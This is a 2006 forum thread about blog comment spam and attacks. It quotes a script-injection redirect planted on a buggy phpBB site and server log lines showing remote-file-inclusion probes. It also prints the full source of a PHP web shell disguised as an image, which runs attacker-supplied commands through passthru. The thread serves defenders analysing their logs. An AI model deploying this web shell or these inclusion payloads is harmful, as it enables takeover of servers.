1 Mar 07, 2006 03:16

Today I got a stealth style of comment spam.

The URL becomes stealthy by using a bug of an unrelated site.
For example:

There is a *free* PHPBB site which has left the PHPBB software buggy, so spammers use script injection such as:

<span class="maintitle">Cheap Phentermine</span><br /><span class="gen">Cheap Phentermine"><script>var s='http://robodir.com/search.php?tpl=pharm&q=phentermine'; i=1; if (1==i) { document.location=s; } </script><br />&nbsp; </span>

Oh, it is truly *free*!! :-P

How can I handle this type of spam with a blacklist? Should badly maintained sites also be on the blacklist? A site redirected by this technique is not a spammer site, but through search results it shows the spammer's site.

Another example is that some sites have a frame which doesn't check the child frame URL, which is provided by a GET method parameter, such as

http://www.teachnet.ie/projects.asp?url=http://url_you_want_to_go/

This is easier than the first example, because the spammer's URL shows inside the URL string, but it is difficult to reject using a DNSRBL-based filter.

2 Mar 07, 2006 16:25

I've started seeing something different in my own logs, specifically:

200-171-180-139.dsl.telesp.net.br - - [02/Mar/2006:21:07:00 -0600] "GET /archives/category/irritations/index.php?showresults=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/
img/btn_lists.gif?&cmd=id HTTP/1.0" 200 32374 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
ppp106-67.lns1

201-13-106-48.dsl.telesp.net.br - - [07/Mar/2006:07:26:07 -0600] "GET /archives/category/irritations/index.php?showresults=http://www.moonyoung.seoul.kr/zboard/data/
food/pc110002.jpg?&cmd=id HTTP/1.0" 200 32770 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Your thing *looks* more sinister than mine, btw. I just have one more netblock of Brazilian IPs to block :) That, and a ban on URLs that contain "zboard".

If you ever wanted to feel intimidated, look at this:

http://www.moonyoung.seoul.kr/zboard/data/

(clicky clicky on some of those) There's definitely something to be said for being able to R E A D what it is I'm clicking on.

Malformed image:
http://www.moonyoung.seoul.kr/zboard/data/food/Pc110002.jpg

My guess is that's not an image at all.
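As an added example (not code posted in this thread), a small Python check covering both situations described above: it pulls the real destination host out of a URL that only carries it in a query value (the `?url=` redirector from the first post, or the `showresults=http://...` include parameter from these log lines), so a blacklist can be applied to the destination instead of the intermediary site, and it flags the include-plus-`cmd=` pattern from the quoted log. The log lines and host names below are constructed placeholders, not the poster's real entries.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format, the shape of the lines quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines modelled on the quoted log; hosts are placeholders.
SAMPLE_LOG = [
    '10.0.0.1 - - [02/Mar/2006:21:07:00 -0600] "GET /archives/index.php'
    '?showresults=http://compromised.example/zboard/img/btn_lists.gif?&cmd=id'
    ' HTTP/1.0" 200 32374 "-" "Mozilla/4.0 (compatible; MSIE 6.0b)"',
    '10.0.0.2 - - [02/Mar/2006:21:08:00 -0600] "GET /archives/index.php'
    '?showresults=5 HTTP/1.0" 200 1024 "-" "Mozilla/5.0"',
]

def embedded_remote_hosts(url):
    """Hosts of absolute URLs carried in the query values of `url`: the real
    destination behind ?url=http://... or ?showresults=http://..."""
    hosts = []
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://")):
            host = urlsplit(value).hostname
            if host:
                hosts.append(host.lower())
    return hosts

def classify_request(line):
    """Parse one log line; None if it does not parse, else a summary dict."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    params = dict(parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True))
    remote = embedded_remote_hosts(m.group("target"))
    return {
        "client": m.group("client"),
        "remote_hosts": remote,
        "cmd": params.get("cmd"),
        # remote URL in an include parameter plus cmd= in the same request:
        # the pattern of a file-inclusion probe rather than a plain redirect
        "rfi_probe": bool(remote) and "cmd" in params,
    }

if __name__ == "__main__":
    for hit in filter(None, map(classify_request, SAMPLE_LOG)):
        if hit["rfi_probe"]:
            print(hit["client"], "included", hit["remote_hosts"], "cmd =", hit["cmd"])
```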

3 Mar 07, 2006 16:33

and so it's not:

<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">CMD</font></b> <font face="verdana" size="2"> - System CoManD<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>
<b>#</b> CMD PHP : <h1>PHP SHELL</h1><br>
<b>#</b></b></font><br>
<br>
<br>
<hr color="#000000" width=80% height=115px>
<br>
<div align="center">
  <table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
    <tr>
      <td width="633" height="17">
<pre><font color="gray" font face="Tahoma" size="2">
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
   passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
 </tr>
  </table>
</div>

<br>
<hr color="#000000" width=80% height=115px>
<p align="left">
<br>
<b> <font face="Verdana" size="1" color="#008000">PHP SHELL</font></b> <font face="Verdana" size="1" color="#008000"><br><b>
#<a href="mailto:PHPSHELL@bol.com.br">Contact
      Us</font></a></b><br><font face="Verdana" size="1" color="#008000"><b>#
:D </b>
</font>

how pleasant :)

It was rooted, http://www.zone-h.com/defacements/mirror/id=3356327/

4 Mar 07, 2006 18:07

I hate to target one country, BUT, if anyone is interested in the CIDR notation needed to cover the entire country of Brazil, let me know, I'll share 8|

5 Mar 12, 2006 00:44

I'm getting new comment spam with nonsense domain names.

author: Wwqh3nFLyh
email: e97pG@OlR9DoD.com
url: http://Wwqh3nFLyh.com
comment: c5Cqm09w8hcC mEtjZ45otQSWRH 9F2Y0pfO9Tbcz...

and so on..

I got two in the last 10 minutes, but they've been getting stronger every time through. What are they doing?

I'm running 1.6 Alpha. I've renamed my directories a number of times and have an extensive .htaccess file. Is it time to require users to log in to comment?

6 Mar 14, 2006 19:29

I got six more of these today. Since there's no way to stop it I think I'll have to require registration to comment.